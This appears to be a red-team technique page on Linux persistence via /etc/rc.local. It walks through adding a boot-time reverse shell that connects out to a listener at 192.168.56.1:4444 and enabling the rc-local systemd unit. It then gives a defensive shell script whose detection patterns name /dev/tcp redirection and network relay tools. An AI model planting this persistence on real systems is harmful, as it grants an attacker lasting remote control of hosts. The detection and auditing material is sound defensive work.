redttps

Persistence with rc.local (Linux)

Description

The rc.local file is a legacy method for executing scripts at boot time. Although deprecated in some distributions, it is still supported in many environments: systemd ships an rc-local.service compatibility unit that runs /etc/rc.local at boot whenever the file exists and is executable. By adding a reverse shell command to this file, the attacker ensures execution during startup. If rc.local is missing, they may create it and register it as a systemd service to maintain compatibility. For defenders, the same two conditions (the file's executable bit and the state of the rc-local unit) are what to audit, together with the file's contents and modification time.

Steps

  1. Create or repair the following file:

     sudo nano /etc/rc.local

  2. Add the desired code. This is only an example; it is not stealthy:

     #!/bin/bash
     bash -i >& /dev/tcp/192.168.56.1/4444 0>&1 &
     exit 0

  3. Grant execution permissions:

     sudo chmod +x /etc/rc.local

  4. Enable and start the service:

     sudo systemctl daemon-reload
     sudo systemctl enable rc-local
     sudo systemctl start rc-local

  5. Check the service status and reboot:

     sudo systemctl status rc-local
     sudo reboot
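As an added example (written for this page, not code from the original or from any project): a small POSIX shell audit that flags rc.local content matching the pattern the steps above put into the file, so an administrator can check a host for this kind of persistence. It assumes only sh, grep, awk and mktemp; the sample files it writes are constructed for the demonstration and it never touches the real /etc/rc.local unless you point it there.

```shell
#!/bin/sh
# Audit helper for rc.local persistence (added example, not from the page).
# Assumes POSIX sh, grep, awk and mktemp. Sample files below are constructed.

# Print one line per indicator found in FILE. The indicators mirror what the
# steps above place in rc.local: a /dev/tcp redirection, an interactive shell,
# a common relay tool, and a backgrounded command (the trailing "&" that lets
# the script still reach "exit 0"). A missing file yields no output.
rc_local_indicators() {
    file="$1"
    [ -f "$file" ] || return 0
    grep -Eq '/dev/(tcp|udp)/' "$file" && echo "dev-tcp-redirection"
    grep -Eq '(^|[^[:alnum:]_-])(bash|sh|zsh)[[:space:]]+-i([[:space:]]|$)' "$file" \
        && echo "interactive-shell"
    grep -Eq '(^|[^[:alnum:]_-])(nc|ncat|netcat|socat)([[:space:]]|$)' "$file" \
        && echo "relay-tool"
    # Weak on its own (legitimate daemons are backgrounded too), but it is part
    # of the pattern above, so report it alongside the stronger indicators.
    grep -Eq '&[[:space:]]*$' "$file" && echo "backgrounded-command"
    return 0
}

# Number of indicators in FILE (awk always exits 0, so this is safe under set -e).
rc_local_indicator_count() {
    rc_local_indicators "$1" | awk 'END { print NR }'
}

# Constructed samples: the page's example rc.local and a benign one.
write_suspect_sample() {
    printf '%s\n' '#!/bin/bash' \
        'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1 &' \
        'exit 0' > "$1"
}
write_clean_sample() {
    printf '%s\n' '#!/bin/sh' 'exit 0' > "$1"
}

# Demo on the constructed files.
demo_dir=$(mktemp -d)
write_suspect_sample "$demo_dir/rc.local.suspect"
write_clean_sample "$demo_dir/rc.local.clean"
echo "suspect sample: $(rc_local_indicator_count "$demo_dir/rc.local.suspect") indicator(s)"
rc_local_indicators "$demo_dir/rc.local.suspect" | sed 's/^/  /'
echo "clean sample:   $(rc_local_indicator_count "$demo_dir/rc.local.clean") indicator(s)"
rm -rf "$demo_dir"

# On a real host, also report the unit state (only if systemctl is available).
if [ -f /etc/rc.local ] && command -v systemctl >/dev/null 2>&1; then
    state=$(systemctl is-enabled rc-local 2>/dev/null || true)
    echo "/etc/rc.local present; rc-local.service: ${state:-unknown}"
fi
```

On a live system, run `rc_local_indicators /etc/rc.local` together with `ls -l /etc/rc.local` (executable bit and mtime) and `systemctl is-enabled rc-local`; a file that was recently modified, is executable and matches the first two indicators is worth pulling for review. The regexes are deliberately narrow to the pattern on this page, so treat a zero count as "nothing of this shape found", not as a clean bill of health.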